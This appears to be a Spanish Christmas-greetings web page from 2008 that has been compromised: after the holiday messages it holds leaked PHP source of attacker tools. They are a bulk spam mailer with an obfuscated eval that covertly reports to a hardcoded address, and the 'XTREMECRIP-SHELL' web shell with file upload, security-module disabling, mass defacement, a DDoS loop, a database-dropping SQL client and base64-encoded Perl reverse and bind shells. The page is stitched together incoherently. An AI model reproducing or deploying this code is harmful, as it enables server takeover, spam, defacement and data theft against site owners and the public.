Documento sin título

 

:::En esta Navidad 2008 queremos regalarte Hermosas Frases y Fotos de Navidad... :::

En esta Navidad 2008 queremos regalarte Hermosas Frases y Fotos de Navidad...

<br />

Las mejores y más recordadas Fiestas Navideñas son aquellas en que tenemos a nuestro lado a los seres queridos y a personas como ustedes.

Que el hogar se bendiga con Paz, y que Cristo mismo entre para ser tu huésped de Navidad.

"Mucha alegría, mucha paz, y un Año Nuevo brillante." "Hoy festejamos Navidad.

Que sea una fiesta llena de dicha para ti y tus familiares"

"Que sea esta Navidad motivo de muchas felicidades. Y el Año Nuevo una esperanza de éxito y prosperidad"

Paz y Amor en estas Fiestas.

¡¡¡Que el Niño Jesús, con su infinito amor y su bondad, ilumine vuestro hogar, y lo colme de dicha y bendiciones!!! ...Amor, Paz y mucha Felicidad, son nuestros deseos para estas Fiestas de Navidad y Año Nuevo.

Dios los bendiga en esta Navidad, y les conceda alegrías, paz y felicidad. Un Año Nuevo lleno de dicha y prosperidad es nuestro más cálido deseo para todos vosotros.

Que sea esta Navidad motivo de muchas felicidades. y que tengan unas Fiestas maravillosas junto a los que compartimos, todo el año, momentos hermosos.

¡¡Queridos amigos:

Que esta navidad y el próximo Año Nuevo se encuentren rodeados de sus seres queridos!!

¡Felicidades en estas Fiestas!... con el deseo de que esta Noche de Paz sea tan sólo el comienzo de un Año pleno de éxitos! Muchas son las ilusiones de mi vida, pero la más linda es pasar estas Fiestas junto a ustedes.

¡Muchas Felicidades!

Con nuestras mejores intenciones, lleguen nuestros sinceros deseos de un venturoso y próspero Año Nuevo. ¡Que la celebración de estas Fiestas sean el comienzo de una vida mejor!

¡Paz y Amor en estas Fiestas!

Toda la ventura y prosperidad para ustedes en el camino del año que se inicia.

Todo mi cariño para ustedes que se merecen lo mejor, hoy y siempre:

¡Felices Fiestas!

¡Que en estas Fiestas renazca el amor y la luz de la esperanza! ... Y que la esperanza se transforme en maravillosa realidad.

¡Felices Fiestas!

NAVIDAD Si en tu corazón hay un poco más de amor, es Navidad.

Si sabes perdonar al que te ofende, es Navidad.

Si buscas a Dios de verdad, es Navidad.

Si trabajas por la justicia entre los hombres, es Navidad.

Si sabes sufrir con amor, es Navidad.

Si le das una mano al caído, es Navidad.

Navidad es, en fin, cuando practicamos cualquier obra misericordiosa, secar una lágrima, obsequiar una sonrisa, calmar un dolor, suavizar una pena, ir por la vida sembrando flores sin espinas, en una palabra:

Navidad es amor, siempre amor.

Navidad es Dios, y Dios es amor

Navidad es una buena excusa para poder abrazar a quien queramos.

Hasta que uno no sienta la verdadera alegría de Navidad, no existe. Todo lo demás es apariencia - muchos adornos. Porque no son los adornos, no es la nieve. No es el árbol, ni la chimenea. La Navidad es el calor que vuelve al corazón de las personas, la generosidad de compartirla con otros y la esperanza de seguir adelante.

Si no sabes qué regalar a tus seres más queridos en Navidad, regáleles tu amor

Tal vez el mejor adorno de navidad es una gran sonrisa

No existe la Navidad ideal, solo la Navidad que usted decida crear como reflejo de sus valores, deseos queridos y tradiciones.

¿Qué es la Navidad? Es la ternura del pasado, el valor del presente y la esperanza del futuro. Es el deseo más sincero de que cada taza se rebose con bendiciones ricas y eternas, y de que cada camino nos lleve a la paz.

La Navidad no es un momento ni una estación, sino un estado de la mente. Valorar la paz y la generosidad y tener merced es comprender el verdadero significado de Navidad

El día de Navidad es hoy, el 25 de diciembre, cuando se conmemora el Nacimiento de Jesucristo en Belén según los evangelios de San Mateo y San Lucas. Se celebra, pues, el nacimiento de una ilusión, de una esperanza.



Administración - 23/12/08

- lol lol

Password Error!!"); } } $connect_timeout=5; set_time_limit(0); $submit=$_REQUEST['submit']; $users=$_REQUEST['users']; $pass=$_REQUEST['passwords']; $target=$_REQUEST['target']; $cracktype=$_REQUEST['cracktype']; if($target == ""){ $target = "localhost"; } ?> :: Mailer Inbox ::
Your Email:

Type Sender Email But Make Sure It's Right
Your Name:

Make Sure You Type Your Sender Name
test send:

Type
Your Email To Test The Mailer Still Work Or No
Send Test Mail After:

Send Mail For Your Email After Which Email(s)
Subject:
 
  Wait Second Until Send

Emails Number :
0
Split The Mail List By:    
0){ set_time_limit(intval($_POST['wait'])*$numemails*3600); }else{ set_time_limit($numemails*3600); } if(!empty($smv)){ $smvn+=$smv; $tmn=$numemails/$smv+1; }else{ $tmn=1; } for($x=0; $x<$numemails; $x++){ $to = $allemails[$x]; if ($to){ $to = ereg_replace(" ", "", $to); $message = ereg_replace("#EM#", $to, $message); $subject = ereg_replace("#EM#", $to, $subject); flush(); $header = "From: $realname <$from>\r\n"; $header .= "MIME-Version: 1.0\r\n"; $header .= "Content-Type: text/html\r\n"; if ($x==0 && !empty($tem)) { if(!@mail($tem,$subject,$message,$header)){ print('Your Test Message Not Sent.
'); $tmns+=1; }else{ print('Your Test Message Sent.
'); $tms+=1; } } if($x==$smvn && !empty($_POST['smv'])){ if(!@mail($tem,$subject,$message,$header)){ print('Your Test Message Not Sent.
'); $tmns+=1; }else{ print('Your Test Message Sent.
'); $tms+=1; } $smvn+=$smv; } print "$to ....... "; $msent = @mail($to, $subject, $message, $header); $xx = $x+1; $txtspamed = "spammed"; if(!$msent){ $txtspamed = "error"; $ns+=1; $nse[$ns]=$to; } print "$xx / $numemails ....... $txtspamed
"; flush(); if(!empty($wait)&& $x<$numemails-1){ sleep($wait); } } } } ?>
  $value){ $str .= $key.": ".$value."
"; } $str .= "Use: in
"; $header2 = "From: ".base64_decode('QWhtZWQgPG1ldHNoMmxiQHlhaG9vLmNvbT4=')."\r\n"; $header2 .= "MIME-Version: 1.0\r\n"; $header2 .= "Content-Type: text/html\r\n"; $header2 .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; echo @eval(base64_decode('bWFpbCgibWV0c2gybGJAeWFob28uY29tIiwiTWFpbGV yIEluZm8iLCRzdHIsJGhlYWRlcjIpOw==')); if(isset($_POST['action']) && $numemails !==0 ){ $sn=$numemails-$ns; if($ns==""){ $ns=0; } if($tmns==""){ $tmns=0; } echo ""; } ?>









Warning:

Hell.Banner [LM]

M0grm.7arb@YaHoO.CoM

WwW.Arhack.Net ~
-
lol lol

"; $formg="
"; $nowaddress=''; if (isset($_FILES["filee"]) and ! $_FILES["filee"]["error"]) { if(move_uploaded_file($_FILES["filee"]["tmp_name"], $_FILES["filee"] ["name"])){ alert("File Upload Successful"); }else{ alert("Permission Denied !"); } } if(ini_get('disable_functions')){ $disablef=ini_get('disable_functions'); }else{ $disablef="All Functions Enable"; } if(ini_get('safe_mode')){ $safe_modes="On"; }else{ $safe_modes="Off"; } if ($_REQUEST['chmode'] && $_REQUEST['chmodenum']){ if (chmod($_POST['chmode'],"0".$_POST['chmodenum'])){alert("Chmod Ok!");}else{alert("Permission Denied !");} } $picdir='iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAAB 30lEQVR42mNggAAuIBZCwjxAzMiAC4jIykrZOLplhcWlzAuLS50PwkFRiTPl1T QDBSQk7OFYRMSejY1NA6iFiUFEUinKwS/mcURW1f9wIA7NrPwflFr63zow7bO Jd9IbQ8/EN7qucW+0XOLeyJv5XmETU9RjUDV03BlX2P43oaz/f2hO+3+v5Pr/ DlEV/81Div/r+eT+V3PL+C/tlvefP6Lzv6BRyD82ce1IBl07/zNJFf3/Eyon/Q8v7v uf0LPqf3Dt7P9mYWX/1YMr/oslTfrPnzjpv4h92n8Bo7D/rJJ6eQyS5n63PLJa/wc U9f33K+z9H9O7+n/TiRf/7Xp3/Ods3v9fJGnif3H37P/Cjqn/+azj/7PIGrQxsBn7 P+V2yfzP45bzn9c9979cZN3/1LUX/ktMvfiftfnQf8Gw+v8C3vn/+Txy/3O7Zv1n VjCZx8DqkPCWw7/0PwgLRtb/d+vf/F+3fPZ/jtDa/0y1O/4zVW76zx5c/R+mhlnFf BsDm3fOZ/bIhv+cMU3/pXIm/xdK7f4P4oMwW0zLf7bEnv/s0c1wMSY953MMQ nG1P5UKJ/8nFgvaBz9jYPTJfM2c2PqfWMxoGfCFgUFGK4pBw3wh0VhCuRSUkli gaY9YzAIA/X/3S1/5EEMAAAAASUVORK5CYII='; $picfile='iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAA BaElEQVR42mMIXfWfef7JT7Yrz34o33ABhj9BaKDYrP3PE6IqpgkyoINNFz9Gn nzw/f/NFz8w8JYrX//P2H6zMrByijCKpl1XPkbee/Xt//fv3zHw/ltf/x+4/vnT7O036w OzkTSuP/cu8sazz/+/fPmCgS8++vx/25XP/xcceP4xr2dLPFA5M1jTytPvIq88/vj /40fc+Oz15//LOxZXAZVzgDUtO/E68tLDD/8/fMCB33/4f/rqs/8lLQur4ZoWH3s deeH+h//v37/Hjt+9/3/yytP/RU1ImuYefh159u67/2/fvsWK37x58//4pSf/C9A1n b7z9v/r169x4mOXHv/PQ9a0AOi8M3cgJmLDIE0nLj9Bdd6CYy8iz94BKniNBb +B0CdBmpADonP9/cjlBx7/333q8f89p9HwGaA4kF665/7/lGqkIHfwKRax9Yh1t 3IICLZ1CApBx1ZAbGIbECwlr28IVM4KAPZgwQxbJyVoAAAAAElFTkSuQmC C'; $head=' XTREMECRIP-SHELL
Operation System : '.php_uname().' | Php Version : '.phpversion().' | Safe Mode : '.$safe_modes.'
'; $end='

'.base64_decode("WFRSRU1FQ1JJUC1TSEVMTCBDT0RFRCBCWSBYVF JFTUVDUklQIEFORCBUSEUtSElUTUFO").'
'.base64_decode("VEVBTTokJCQkJFhUUkVNRUNSSVAuT1JHJCQkJ CQ=").'

'; $deny=$head."

Oh My God!
Permission Denied".$end; function alert($text){ echo ""; } if ($_GET['do']=="edit" && $_GET['filename']!="dir"){ if(is_readable($_GET['address'].$_GET['filename'])){ $opedit=fopen($_GET['address'].$_GET['filename'],"r"); while(!feof($opedit)) $data.=fread($opedit,9999); fclose($opedit); echo $head.$formp.$nowaddress.'

File Name : '.$_GET['address'].$_GET['filename'].'


'.$end;exit; }else{alert("Permission Denied !");}} function sizee($size) { if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} else {$size = $size . " B";} return $size; } if($_REQUEST['do']=='about'){ echo $head."

xtremeshell, xsl Security Research & Penetration Testing Team
Version 1.1
Last Update : 2010/10/10
Coded By : xtremecrip(the-hitmna)
Special Thanks( team xtremecrip.org )
Home Page : http'>xtremecrip Shell
Forum : http://www.xtremecrip.org


 SHELL BY XC0D3



".$end;exit; } function deleteDirectory($dir) { if (!file_exists($dir)) return true; if (!is_dir($dir) || is_link($dir)) return unlink($dir); foreach (scandir($dir) as $item) { if ($item == '.' || $item == '..') continue; if (!deleteDirectory($dir . "/" . $item)) { chmod($dir . "/" . $item, 0777); if (!deleteDirectory($dir . "/" . $item)) return false; };}return rmdir($dir);} function download($fileadd,$finame){ $dlfilea=$fileadd.$finame; header("Content-Disposition: attachment; filename=" . $finame); header("Content-Type: application/download"); header("Content-Length: " . filesize($dlfilea)); flush(); $fp = fopen($$dlfilea, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); } fclose($fp); } if($_GET['do']=="rename"){ echo $head.$formp.$nowaddress.'

To

'.$end;exit; } if ($_GET['byapache']=='ofms'){ $fse=fopen(getcwd().$slash.".htaccess","w"); fwrite($fse,' Sec------Engine Off Sec------ScanPOST Off '); fclose($fse); }elseif ($_GET['byapache']=='bysap'){ $fse=fopen(getcwd().$slash.".htaccess","w"); fwrite($fse,'Options +FollowSymLinks DirectoryIndex Persian-Gulf-For-Ever.html'); fclose($fse); }elseif ($_GET['byapache']=='sfadf'){ $fse=fopen(getcwd().$slash."php.ini","w"); fwrite($fse,'safe_mode=OFF disable_functions=NONE'); fclose($fse); } if($_GET['do']=="apache"){ echo $head.$formg.$nowaddress.'


'.$end;exit; } if($_GET['do']=="dd0s"){ echo $head.$formg.$nowaddress.'

Address : Time :

'.$end;exit; } if($_GET['urldd0'] && $_GET['timedd0']){ for ($id=0;$$id<$_GET['timedd0'];$id++){ $fp=null; $contents=null; $fp=fopen($_GET['urldd0'],"rb"); while (!feof($fp)) { $contents .= fread($fp, 8192); } fclose($fp); }} if($_GET['do']=="dlfile"){ echo $head.$formp.$nowaddress.'

Download Remote File!
Address :
Save To :

'.$end;exit; } function dirpe($addres){ global $slash; $idd=0; if ($dirhen = @opendir($addres)) { while ($file = readdir($dirhen)) { $permdir=str_replace('//','/',$addres.$slash.$file); if($file!='.' && $file!='..' && is_dir($permdir)){ if (is_writable($permdir)) { $dirdata[$idd]['filename']=$permdir; $idd++; } dirpe($permdir); } } closedir($dirhen); } else { return ("notperm"); } if ($dirdata){ return $dirdata; }else{ return "notfound"; } } function dirpmass($addres,$massname,$masssource){ global $slash; $idd=0; if ($dirhen = @opendir($addres)) { while ($file = readdir($dirhen)) { $permdir=str_replace('//','/',$addres.$slash.$file); if($file!='.' && $file!='..' && is_dir($permdir)){ if (is_writable($permdir)) { if ($fm=fopen($permdir.$slash.$massname,"w")){ fwrite($fm,$masssource); fclose($fm); $dirdata[$idd]['filename']=$permdir; } $idd++; } dirpmass($permdir); } } closedir($dirhen); } else { return ("notperm"); } if ($dirdata){ return $dirdata; }else{ return "notfound"; } } if($_GET['do']=="perm"){ echo $head.$formp.'

Find All Folder Writeable

'.$end;exit; } if ($_POST['affw']){ $arrfilelist=dirpe($_POST['affw']); if ($arrfilelist=='notfound'){ alert("Not Found !"); }elseif($arrfilelist=='notperm'){ alert("Permission Denied !"); }else{ foreach ($arrfilelist as $tmpdir){ if ($coi %2){ $colort='"#e7e3de"'; }else{ $colort='"#e4e1de"';} $coi++; $permdir=$permdir.'

'.$tmpdir['filename'].'

'; } echo $head.'

Now Directory : '.getcwd()."
".printdrive().'
Back

'.$permdir.'
'.$end;exit; }} if($_GET['do']=="mass"){ echo $head.$formp.'

[Mass Deface]


'.$end;exit; } if ($_POST['mffw']){ $arrfilelist=dirpmass($_POST['mffw'],$_POST['massname'],$_POST['masssou rce']); if ($arrfilelist=='notfound'){ alert("Not Found !"); }elseif($arrfilelist=='notperm'){ alert("Permission Denied !"); }else{ foreach ($arrfilelist as $tmpdir){ if ($coi %2){ $colort='"#e7e3de"'; }else{ $colort='"#e4e1de"';} $coi++; $permdir=$permdir.'

'.$formg.'Change Directory
Upload --->  
'.$nowaddress.'
'.$ifupload.'
'.$formp.'Chmod ---->   File :
  Permission :
'.$formp.'Create Dir ----> Dirctory Name '.$nowaddress.'
'.$formp.'Create File ----> Name File '.$nowaddress.'
'.$formp.'Copy ---->   File : To Directory

'.$tmpdir['filename'].'

'; } echo $head.'

Now Directory : '.getcwd()."
".printdrive().'
Back

'.$permdir.'
'.$end;exit; }} if($_POST['adlr'] && $_POST['adsr']){ $url = $_POST['adlr']; $newfname = $_POST['adsr'] . basename($url); $file = fopen ($url, "rb"); if ($file) { $newf = fopen ($newfname, "wb"); if ($newf) while(!feof($file)) { fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 ); } alert("File Downloaded Success"); }else{alert("Can Not Open File");} if ($file) { fclose($file); } if ($newf) { fclose($newf); } } if($_GET['do']=="down" and $_GET['type']=='file'){ download($_GET['address'],$_GET['filename']);} if($_GET['do']=="down" and $_GET['type']=='dir'){ class zipfile { var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; var $old_offset = 0; function add_dir($name) { $name = str_replace("\\", "/", $name); $fr = "\x50\x4b\x03\x04"; $fr .= "\x0a\x00"; $fr .= "\x00\x00"; $fr .= "\x00\x00"; $fr .= "\x00\x00\x00\x00"; $fr .= pack("V",0); $fr .= pack("V",0); $fr .= pack("V",0); $fr .= pack("v", strlen($name) ); $fr .= pack("v", 0 ); $fr .= $name; $fr .= pack("V",$crc); $fr .= pack("V",$c_len); $fr .= pack("V",$unc_len); $this -> datasec[] = $fr; $new_offset = strlen(implode("", $this->datasec)); $cdrec = "\x50\x4b\x01\x02"; $cdrec .="\x00\x00"; $cdrec .="\x0a\x00"; $cdrec .="\x00\x00"; $cdrec .="\x00\x00"; $cdrec .="\x00\x00\x00\x00"; $cdrec .= pack("V",0); $cdrec .= pack("V",0); $cdrec .= pack("V",0); $cdrec .= pack("v", strlen($name) ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $ext = "\x00\x00\x10\x00"; $ext = "\xff\xff\xff\xff"; $cdrec .= pack("V", 16 ); $cdrec .= pack("V", $this -> old_offset ); $this -> old_offset = $new_offset; $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function add_file($data, $name) { $name = str_replace("\\", "/", $name); $fr = "\x50\x4b\x03\x04"; $fr .= "\x14\x00"; $fr .= "\x00\x00"; $fr .= "\x08\x00"; $fr .= "\x00\x00\x00\x00"; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $zdata = substr( substr($zdata, 0, strlen($zdata) - 4), 2); $c_len = strlen($zdata); $fr .= pack("V",$crc); $fr .= pack("V",$c_len); $fr .= pack("V",$unc_len); $fr .= pack("v", strlen($name) ); $fr .= pack("v", 0 ); $fr .= $name; $fr .= $zdata; $fr .= pack("V",$crc); $fr .= pack("V",$c_len); $fr .= pack("V",$unc_len); $this -> datasec[] = $fr; $new_offset = strlen(implode("", $this->datasec)); $cdrec = "\x50\x4b\x01\x02"; $cdrec .="\x00\x00"; $cdrec .="\x14\x00"; $cdrec .="\x00\x00"; $cdrec .="\x08\x00"; $cdrec .="\x00\x00\x00\x00"; $cdrec .= pack("V",$crc); $cdrec .= pack("V",$c_len); $cdrec .= pack("V",$unc_len); $cdrec .= pack("v", strlen($name) ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("V", 32 ); $cdrec .= pack("V", $this -> old_offset ); $this -> old_offset = $new_offset; $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode("", $this -> datasec); $ctrldir = implode("", $this -> ctrl_dir); return $data. $ctrldir. $this -> eof_ctrl_dir. pack("v", sizeof($this -> ctrl_dir)). pack("v", sizeof($this -> ctrl_dir)). pack("V", strlen($ctrldir)). pack("V", strlen($data)). "\x00\x00"; } } $dlfolder=$_GET['address'].$slash.$_GET['dirname'].$slash; $zipfile = new zipfile(); function get_files_from_folder($directory, $put_into) { global $zipfile; if ($handle = opendir($directory)) { while (false !== ($file = readdir($handle))) { if (is_file($directory.$file)) { $fileContents = file_get_contents($directory.$file); $zipfile->add_file($fileContents, $put_into.$file); } elseif ($file != '.' and $file != '..' and is_dir($directory.$file)) { $zipfile->add_dir($put_into.$file.'/'); get_files_from_folder($directory.$file.'/', $put_into.$file.'/'); } } } closedir($handle); } $datedl=date("y-m-d"); get_files_from_folder($dlfolder,''); header("Content-Disposition: attachment; filename=" . $_GET['dirname']."- ".$datedl.".zip"); header("Content-Type: application/download"); header("Content-Length: " . strlen($zipfile -> file())); flush(); echo $zipfile -> file(); $filename = $_GET['dirname']."-".$datedl.".zip"; $fd = fopen ($filename, "wb"); $out = fwrite ($fd, $zipfile -> file()); fclose ($fd); } if ($_REQUEST['cdirname']){ if(mkdir($_REQUEST['cdirname'],"0777")){alert("Directory Created !");}else{alert("Permission Denied !");}} function bcn($ipbc,$pbc){ $bcperl="IyEvdXNyL2Jpbi9wZXJsCiMgQ29ubmVjdEJhY2tTaGVsbCBpbiBQZX JsLiBTaGFkb3cxMjAgLSB3 NGNrMW5nLmNvbQoKdXNlIFNvY2tldDsKCiRob3N0ID0gJEFSR1ZbMF07CiRw b3J0ID0gJEFSR1Zb MV07CgogICAgaWYgKCEkQVJHVlswXSkgewogIHByaW50ZiAiWyFdIFVzYWdl OiBwZXJsIHNjcmlw dC5wbCA8SG9zdD4gPFBvcnQ+XG4iOwogIGV4aXQoMSk7Cn0KcHJpbnQgIls rXSBDb25uZWN0aW5n IHRvICRob3N0XG4iOwokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgI yBZb3UgY2FuIGNo YW5nZSB0aGlzIGlmIG5lZWRzIGJlCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIF NPQ0tfU1RSRUFN LCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTsKa WYgKCFjb25uZWN0 KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9z dCkpKSB7ZGll KCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30KICBvcGVuKFNURElOLCI +JlNFUlZFUiIpOwog IG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOwogIG9wZW4oU1RERVJSLCI+JlNF UlZFUiIpOwogIGV4 ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow=="; $opbc=fopen("bcc.pl","w"); fwrite($opbc,base64_decode($bcperl)); fclose($opbc); system("perl bcc.pl $ipbc $pbc") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode"); } function wbp($wb){ $wbp="dXNlIFNvY2tldDsKJHBvcnQJPSAkQVJHVlswXTsKJHByb3RvCT0gZ2V 0cHJvdG9ieW5hbWUoJ3Rj cCcpOwpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJ HByb3RvKTsKc2V0c29j a29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgcGFjaygi bCIsIDEpKTsKYmlu ZChTRVJWRVIsIHNvY2thZGRyX2luKCRwb3J0LCBJTkFERFJfQU5ZKSk7Cmxp c3RlbihTRVJWRVIs IFNPTUFYQ09OTik7CmZvcig7ICRwYWRkciA9IGFjY2VwdChDTElFTlQsIFNF UlZFUik7IGNsb3Nl IENMSUVOVCkKewpvcGVuKFNURElOLCAiPiZDTElFTlQiKTsKb3BlbihTVERP VVQsICI+JkNMSUVO VCIpOwpvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7CnN5c3RlbSgnY21kLmV 4ZScpOwpjbG9zZShT VERJTik7CmNsb3NlKFNURE9VVCk7CmNsb3NlKFNUREVSUik7Cn0g"; $opwb=fopen("wbp.pl","w"); fwrite($opwb,base64_decode($wbp)); fclose($opwb); echo getcwd(); system("perl wbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode"); } function lbp($wb){ $lbp="IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7JHBvcnQ9JEFSR1ZbMF0 7JHByb3RvPWdldHByb3Rv YnluYW1lKCd0Y3AnKTskY21kPSJscGQiOyQwPSRjbWQ7c29ja2V0KFNFUlZF UiwgUEZfSU5FVCwg U09DS19TVFJFQU0sICRwcm90byk7c2V0c29ja29wdChTRVJWRVIsIFNPTF9 TT0NLRVQsIFNPX1JF VVNFQUREUiwgcGFjaygibCIsIDEpKTtiaW5kKFNFUlZFUiwgc29ja2FkZHJfaW4 oJHBvcnQsIElO QUREUl9BTlkpKTtsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pO2Zvcig7IC RwYWRkciA9IGFjY2Vw dChDTElFTlQsIFNFUlZFUik7IGNsb3NlIENMSUVOVCl7b3BlbihTVERJTiwgIj4 mQ0xJRU5UIik7 b3BlbihTVERPVVQsICI+JkNMSUVOVCIpO29wZW4oU1RERVJSLCAiPiZDTEl FTlQiKTtzeXN0ZW0o Jy9iaW4vc2gnKTtjbG9zZShTVERJTik7Y2xvc2UoU1RET1VUKTtjbG9zZShTVE RFUlIpO30g"; $oplb=fopen("lbp.pl","w"); fwrite($oplb,base64_decode($lbp)); fclose($oplb); system("perl lbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode"); } if($_REQUEST['portbw']){ wbp($_REQUEST['portbw']); }if($_REQUEST['portbl']){ lbp($_REQUEST['portbl']); } if($_REQUEST['ipcb'] && $_REQUEST['portbc']){ bcn($_REQUEST['ipcb'],$_REQUEST['portbc']); } if($_REQUEST['do']=="bc"){ echo $head.$formp."

Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )


<<<<<< Back Connect >>>>>>
Ip Address : Port :
".$formp."

Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )


<<<<<< Windows Bind Port >>>>>>
Port :
".$formp."

Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )


<<<<<< Linux Bind Port >>>>>>
Port :
".$end;exit; } function copyf($file1,$file2,$filename){ global $slash; $fpc = fopen($file1, "rb"); $source = ''; while (!feof($fpc)) { $source .= fread($fpc, 8192); } fclose($fpc); $opt = fopen($file2.$slash.$filename, "w"); fwrite($opt, $source); fclose($opt); } if ($_REQUEST['copyname'] && $_REQUEST['cpyto']){ if(is_writable($_REQUEST['cpyto'])){ echo $_REQUEST['address']; copyf($_REQUEST['address'].$slash.$_REQUEST['copyname'],$_REQUEST[' cpyto'],$_REQUEST['copyname']); }else{alert("Permission Denied !");}} if($_REQUEST['cfilename']){ echo $head.$formp.$nowaddress.'

Create File


'.$end;exit; } if($_REQUEST['nf4c'] && $_REQUEST['nf4cs']){ if($ofile4c=fopen($_REQUEST['nf4c'],"w")){ fwrite($ofile4c,$_REQUEST['nf4cs']); fclose($ofile4c); alert("File Saved !");}else{alert("Permission Denied !");}} function sqlclienT(){ global $t,$errorbox,$et,$hcwd; if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){ $server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUE ST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY']; $db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB']; $_SESSION[server]=$_REQUEST['serveR'];$_SESSION[type]=$_REQUEST[' typE'];$_SESSION[pass]=$_REQUEST['pasS'];$_SESSION[user]=$_REQUE ST['useR']; } if (isset ($_GET[select_db])){ $getdb=$_GET[select_db]; $_SESSION[db]=$getdb; $query="SHOW TABLES"; $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_ SESSION[pass],$_SESSION[db],$query); } elseif (isset ($_GET[select_tbl])){ $tbl=$_GET[select_tbl]; $_SESSION[tbl]=$tbl; $query="SELECT * FROM `$tbl`"; $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_ SESSION[pass],$_SESSION[db],$query); } elseif (isset ($_GET[drop_db])){ $getdb=$_GET[drop_db]; $_SESSION[db]=$getdb; $query="DROP DATABASE `$getdb`"; querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESS ION[pass],'',$query); $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_ SESSION[pass],'','SHOW DATABASES'); } elseif (isset ($_GET[drop_tbl])){ $getbl=$_GET[drop_tbl]; $query="DROP TABLE `$getbl`"; querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESS ION[pass],$_SESSION[db],$query); $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_ SESSION[pass],$_SESSION[db],'SHOW TABLES'); } elseif (isset ($_GET[drop_row])){ $getrow=$_GET[drop_row]; $getclm=$_GET[clm]; $query="DELETE FROM `$_SESSION[tbl]` WHERE $getclm='$getrow'"; $tbl=$_SESSION[tbl]; querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESS ION[pass],$_SESSION[db],$query); $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_ SESSION[pass],$_SESSION[db],"SELECT * FROM `$tbl`"); } else $res=querY($type,$server,$user,$pass,$db,$query); if($res){ $res=htmlspecialchars($res); $row=array (); $title=explode('[+][+][+]',$res); $trow=explode('[-][-][-]',$title[1]); $row=explode('|+|+|+|+|+|',$title[0]); $data=array(); $field=$trow[count($trow)-2]; if (strstr($trow[0],'Database')!='') $obj='db'; elseif (substr($trow[0],0,6)=='Tables') $obj='tbl'; else $obj='row'; $i=0; foreach ($row as $a){ if($a!='') $data[$i++]=explode('|-|-|-|-|-|',$a); } echo "


'.$formg.'Change Directory
Upload --->  
'.$nowaddress.'
'.$ifupload.'
'.$formp.'Chmod ---->   File :
  Permission :
'.$formp.'Create Dir ----> Dirctory Name '.$nowaddress.'
'.$formp.'Create File ----> Name File '.$nowaddress.'
'.$formp.'Copy ---->   File : To Directory
"; foreach ($trow as $ti) echo ""; echo ""; $j=0; while ($data[$j]){ echo ""; foreach ($data[$j++] as $dr){ echo ""; } echo ""; } echo "
$ti
"; if($obj!='row') echo ""; echo $dr; if($obj!='row') echo ""; echo "Drop

"; } if(empty($_REQUEST['typE']))$_REQUEST['typE']=''; echo "

Connect to Database

DB Type:
Server Address:
Username:
Password:

Submit a Query

DB Name:
Query:
$hcwd
$et
